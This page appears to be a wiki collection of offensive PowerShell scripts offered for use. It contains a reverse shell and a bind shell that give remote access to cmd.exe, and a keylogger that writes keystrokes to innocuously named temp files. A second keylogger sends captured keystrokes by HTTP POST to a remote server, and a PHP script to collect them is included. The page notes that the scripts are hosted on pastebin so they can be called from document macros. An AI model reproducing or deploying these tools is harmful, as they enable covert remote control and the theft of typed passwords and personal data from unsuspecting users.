Useful Scripts

Powershell

These scripts are also stored at [http://pastebin.com/u/powershell] so they can be called from macro's.

Reverse Shell (update address and port before using)

function ReverseShellClean {if ($client.Connected -eq $true) {$client.Close()};if ($process.ExitCode -ne $null) {$process.Close()};  exit; }  $address = '127.0.0.1';  $port = '12345';  $client = New-Object system.net.sockets.tcpclient;   $client.connect($address,$port) ;  $stream = $client.GetStream();  $networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize  ;  $process = New-Object System.Diagnostics.Process  ;  $process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'  ;  $process.StartInfo.RedirectStandardInput = 1  ;  $process.StartInfo.RedirectStandardOutput = 1;  $process.StartInfo.UseShellExecute = 0  ;  $process.Start()  ;  $inputstream = $process.StandardInput  ;  $outputstream = $process.StandardOutput  ;  Start-Sleep 1  ;  $encoding = new-object System.Text.AsciiEncoding  ;  while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())};  $stream.Write($encoding.GetBytes($out),0,$out.Length)  ;  $out = $null; $done = $false; $testing = 0;   while (-not $done) {if ($client.Connected -ne $true) {cleanup}  ;  $pos = 0;   $i = 1;    while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) { $read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos);    $pos+=$read;  if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}  ;  if ($pos -gt 0){ $string = $encoding.GetString($networkbuffer,0,$pos);   $inputstream.write($string);    start-sleep 1;    if ($process.ExitCode -ne $null) {ReverseShellClean};  else {  $out = $encoding.GetString($outputstream.Read());   while($outputstream.Peek() -ne -1){;   $out += $encoding.GetString($outputstream.Read());   if ($out -eq $string) {$out = ''}};    $stream.Write($encoding.GetBytes($out),0,$out.length);    $out = $null;    $string = $null};  } else {ReverseShellClean}};

Bind shell

function BindShell {

$port = "12345"
$encoding = new-object System.Text.AsciiEncoding
$endpoint = new-object System.Net.IpEndpoint ([System.Net.Ipaddress]::any, $port)
$listener = new-object System.Net.Sockets.TcpListener $endpoint
$listener.start()
$socket = $listener.AcceptTcpClient()
$networkstream = $socket.GetStream()
$networkbuffer = New-Object System.Byte[] $socket.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = "C:\\windows\\system32\\cmd.exe"
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput

Start-Sleep 1

while($outputstream.Peek() -ne -1){
    $string += $encoding.GetString($outputstream.Read())
}
$networkstream.Write($encoding.GetBytes($string),0,$string.Length)
$string = ''
$done = $false
while (-not $done) {
    $pos = 0
    $i = 1
    while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
                    $read = $networkstream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
        $pos+=$read
        if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {
            break
        }
    }
    if ($pos -gt 0) {
        $string = $encoding.GetString($networkbuffer,0,$pos)
        $inputstream.write($string)

        # Write Output
        $out = $encoding.GetString($outputstream.Read())
        while($outputstream.Peek() -ne -1){
            $out += $encoding.GetString($outputstream.Read())
        }
        $networkstream.Write($encoding.GetBytes($out),0,$out.length)
        $out = $null
    }
    else {$done = $true}
}          
}
bindshell

Keylogger to local files

function KeyLog {    
$MAPVK_VK_TO_VSC = 0x00    
$MAPVK_VSC_TO_VK = 0x01    
$MAPVK_VK_TO_CHAR = 0x02    
$MAPVK_VSC_TO_VK_EX = 0x03    
$MAPVK_VK_TO_VSC_EX = 0x04
$virtualkc_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
public static extern short GetAsyncKeyState(int virtualKeyCode);
'@
$kbstate_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
'@    
$mapchar_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MapVirtualKey(uint uCode, int uMapType);
'@    
$tounicode_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[]
lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@    
$getKeyState = Add-Type -MemberDefinition $virtualkc_sig -name "Win32GetState" -namespace Win32Functions -passThru    
$getKBState = Add-Type -MemberDefinition $kbstate_sig -name "Win32MyGetKeyboardState" -namespace Win32Functions -passThru    
$getKey = Add-Type -MemberDefinition $mapchar_sig -name "Win32MyMapVirtualKey" -namespace Win32Functions -passThru    
$getUnicode = Add-Type -MemberDefinition $tounicode_sig -name "Win32MyToUnicode" -namespace Win32Functions -passThru
while ($true) {        
Start-Sleep -Milliseconds 40        
$gotit = ""        
for ($char = 1; $char -le 254; $char++)
{$vkey = $char            
$gotit = $getKeyState::GetAsyncKeyState($vkey)            
if ($gotit -eq -32767)
{$l_shift = $getKeyState::GetAsyncKeyState(160)                
$r_shift = $getKeyState::GetAsyncKeyState(161)                
$caps_lock = [console]::CapsLock                
$scancode = $getKey::MapVirtualKey($vkey, $MAPVK_VSC_TO_VK_EX)                
$kbstate = New-Object Byte[] 256                
$checkkbstate = $getKBState::GetKeyboardState($kbstate)                
$mychar = New-Object -TypeName "System.Text.StringBuilder";                
$unicode_res = $getUnicode::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)                
if ($unicode_res -gt 0)
{
$keys = $mychar.ToString()
$temp = "$env:temp\audit"
$logfile = "$env:temp\Logging"
add-content $temp $keys
$text = [string]::Join("`n", (Get-Content $logfile))
Write-Output $text > $logfile
}}}}}
KeyLog

Keylogger to HTTP Post

# PHP Code for logging of keys
# FYI - need to create a keylogs folder for php script to write to
#
# <?php
# $saving = $_REQUEST['saving'];
# if ($saving == "1"){
# $data = $_POST['data'];
# $file = $_POST['filename'];
#
# $fp = fopen("keylogs/".$file, "a") or die("Couldn't open $file for writing!");
# fwrite($fp, $data) or die("Couldn't write values to file!");
# fclose($fp);
# }
# ?>

function KeyLog {    
$MAPVK_VK_TO_VSC = 0x00    
$MAPVK_VSC_TO_VK = 0x01    
$MAPVK_VK_TO_CHAR = 0x02    
$MAPVK_VSC_TO_VK_EX = 0x03    
$MAPVK_VK_TO_VSC_EX = 0x04
$virtualkc_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
public static extern short GetAsyncKeyState(int virtualKeyCode);
'@
$kbstate_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
'@    
$mapchar_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MapVirtualKey(uint uCode, int uMapType);
'@    
$tounicode_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[]
lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@    
$getKeyState = Add-Type -MemberDefinition $virtualkc_sig -name "Win32GetState" -namespace Win32Functions -passThru    
$getKBState = Add-Type -MemberDefinition $kbstate_sig -name "Win32MyGetKeyboardState" -namespace Win32Functions -passThru    
$getKey = Add-Type -MemberDefinition $mapchar_sig -name "Win32MyMapVirtualKey" -namespace Win32Functions -passThru    
$getUnicode = Add-Type -MemberDefinition $tounicode_sig -name "Win32MyToUnicode" -namespace Win32Functions -passThru
while ($true) {        
Start-Sleep -Milliseconds 40        
$gotit = ""        
for ($char = 1; $char -le 254; $char++)
{$vkey = $char            
$gotit = $getKeyState::GetAsyncKeyState($vkey)            
if ($gotit -eq -32767)
{$l_shift = $getKeyState::GetAsyncKeyState(160)                
$r_shift = $getKeyState::GetAsyncKeyState(161)                
$caps_lock = [console]::CapsLock                
$scancode = $getKey::MapVirtualKey($vkey, $MAPVK_VSC_TO_VK_EX)                
$kbstate = New-Object Byte[] 256                
$checkkbstate = $getKBState::GetKeyboardState($kbstate)                
$mychar = New-Object -TypeName "System.Text.StringBuilder";                
$unicode_res = $getUnicode::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)                
if ($unicode_res -gt 0)
{$keydate = get-date -format yyyyMMdd

$logfile = "$env:computername-$keydate-keys.txt"  
$url = "http://myserver/storage/PostKeys.php"
$parameters = "saving=1&data=$keys&filename=$logfile"

$keys = $mychar.ToString()
$http_request = New-Object -ComObject Msxml2.XMLHTTP
$http_request.open('POST', $url, $false)
$http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
$http_request.setRequestHeader("Content-length", $parameters.length)
$http_request.setRequestHeader("Connection", "close")
$http_request.send($parameters)
}}}}}

KeyLog

Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-ShareAlike 3.0 License